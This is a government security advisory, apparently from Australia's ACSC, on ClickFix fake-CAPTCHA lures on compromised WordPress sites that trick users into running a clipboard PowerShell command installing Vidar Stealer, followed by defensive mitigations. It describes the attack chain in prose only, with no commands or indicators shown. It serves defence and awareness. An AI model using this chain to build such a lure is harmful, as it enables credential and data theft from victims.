ClickFix distributing Vidar Stealer via WordPress targeting Australian infrastructure

Overview

The Australian Signals Directorate’s Australian Cyber Security Centre (ASD's ACSC) has observed ClickFix associated activity leveraging WordPress hosted infrastructure to distribute the Vidar Stealer malware. This activity is targeting Australian infrastructure and organisations across multiple sectors. The campaign uses compromised WordPress websites to redirect victims to malware delivery mechanisms. This advisory provides an overview of the activity, an assessment of the threat, observed indicators, detections and recommended mitigations.

Background

ClickFix is a sophisticated social engineering technique observed since early 2024. It supports a range of malicious outcomes, including credential theft and financial compromise, through malware distribution.

ASD's ACSC has detected several variants of this attack. Notably, the large-scale Traffic Distribution System infrastructure detected in 2025, which was observed redirecting users to a ClickFix endpoint, among other attacks.

Since early 2026, ASD's ACSC has become aware of a number of attacks targeting Australian networks, using websites belonging to legitimate Australian businesses as a part of the ClickFix attack vector.

The technique leverages deceptive verification prompts via fake CAPTCHAs (Completely Automated Public Turing test to tell Computers and Humans Apart), to convince users to execute malicious commands or scripts. This user‑driven execution bypasses some preventative security controls and enables the delivery of malware (Vidar in this campaign), increasing the likelihood of successful compromise across Australian networks.

Vidar Stealer is a well-known information stealing malware capable of exfiltrating credentials, browser data, cryptocurrency wallets, and system information, which may subsequently be used to facilitate follow-on malicious activity. Vidar Stealer primarily targets Windows systems.

Technical details

The ClickFix attack typically begins with an adversary injecting a malicious payload delivery domain into the compromised website. The injected payload domain loads JavaScript code from an external API server. This code overwrites the content of the legitimate page, presenting a fraudulent Cloudflare verification prompt.

The malicious JavaScript code retrieves additional content from the API server, including a PowerShell command, which is copied to the user’s clipboard. Once the user selects the “Verify you are human” checkbox, a pop‑up is displayed instructing the user to manually execute the copied command with administrative privileges.

Analysis of ClickFix‑associated activity (in Windows environments) indicates that the obfuscated PowerShell command executed by the user contains a malware delivery URL, hosted on the same payload domain used to inject malicious ClickFix content into the compromised website. Upon execution, the command retrieves and launches the Vidar Stealer malware with minimal user visibility.

Once deployed, Vidar Stealer employs defence‑evasion techniques, including self‑deletion of the initial executable, enabling the malware to persist and operate primarily in memory. This behaviour reduces the effectiveness of forensic techniques.

Following installation, the malware establishes regular command‑and‑control (C2) communications. Initial C2 infrastructure is retrieved via dead‑drop URLs, which commonly leverage publicly accessible services such as Telegram bots and Steam profiles to hinder detection and takedown efforts. Subsequent beaconing activity consists primarily of HTTP/S POST requests that exfiltrate stolen credentials and other sensitive information.

Observed MITRE ATT&CK techniques associated with ClickFix activity detected by, and reported to, ASD's ACSC are detailed in the Appendix.

Mitigations

ASD's ACSC recommends government entities, organisations, businesses and individuals implement the following guidance, aligned with ASD’s Information security manual, to reduce the risk of compromise by a ClickFix attack.

Application control

• Restrict execution of unauthorised or unapproved applications, including downloaded executables and scripts.
• Prevent execution of untrusted binaries delivered via browser‑initiated activity.
• Limit the ability for user‑initiated scripts (e.g. PowerShell) to launch secondary payloads.

Relevance: Prevents execution of Vidar Stealer and follow‑on tooling delivered via ClickFix.

Patch applications

• For website administrators, ensure WordPress, plugins, themes, browsers, and scripting engines are fully patched and up to date.
• For website administrators, remove unused, unsupported, or deprecated WordPress plugins and themes.
• Prioritise patching of internet‑facing applications.

Relevance:Reduces exploitation of WordPress vulnerabilities used for initial website compromise.

User application hardening

• Consider restricting browser‑based scripting (ie. JavaScript) and iframe execution to allow-listed websites only.
• Block or limit clipboard write access from browser‑based JavaScript and untrusted web content.

Relevance: Directly mitigates ClickFix techniques that rely on clipboard manipulation and browser‑based social engineering.

Restrict administrative privileges

• Ensure users with administrative privileges are restricted from executing scripts or commands unless explicitly required.
• Enforce least‑privilege principles and review privileged account usage regularly.

Relevance: Reduces impact of ClickFix instructions that prompt users to run commands as administrators.

Patch operating systems

• Ensure operating systems are kept fully patched with the latest security updates.
• Apply patches promptly to endpoints and servers, particularly those exposed to the internet.

Relevance: Limits post‑compromise exploitation and privilege escalation opportunities.

Multi‑factor authentication (MFA)

• Enforce phishing-resistant MFA for:
  • Administrative accounts
  • Remote access services
  • Cloud services and externally accessible systems

Relevance: Reduces the impact of credential theft performed by Vidar Stealer by requiring MFA to access sensitive information.

Regular backups

• Maintain regular, tested, and offline backups of critical systems and web content.
• Ensure backup integrity and restoration processes are validated.

Relevance: Supports recovery from website compromise or malware‑related incidents.

Network and DNS controls

• Filter inbound and outbound HTTP/S traffic and restrict connections to approved destinations.
• Use protective DNS services to block known malicious domains.

Relevance: Prevents systems from resolving to attacker-controlled domains, including malware distribution sites and C2 infrastructure.

PowerShell controls

• Enforce PowerShell code signing policies.
• Restrict PowerShell from making outbound network connections unless allow-listed.

Relevance: Restricts execution of PowerShell commands for malicious delivery.

Data loss prevention (DLP)

• Monitor for suspicious outbound POST requests and unencrypted data transfers.
• Identify critical sensitive data and implement DLP controls to prevent unauthorised exfiltration of that data.

Relevance: Limits the impact of successful Vidar Stealer infection by detecting or preventing the exfiltration of sensitive data.

Security awareness training

• Educate users on ClickFix‑style social engineering.
• Reinforce guidance to never copy, paste, or execute commands from websites or pop‑ups.

Relevance: Disrupts attack at the earliest stage by reducing the likelihood of a user executing commands copied from a malicious page.

Appendix

Appendix A – Mitre ATT&CK tactics, techniques and procedures

Mitre ATT&CK Techniques observed in ClickFix incidents detected by and reported to ASD's ACSC in 2026.

Indicators of compromise (IOC)

For a downloadable copy of IOCs observed, see the attached CSV file.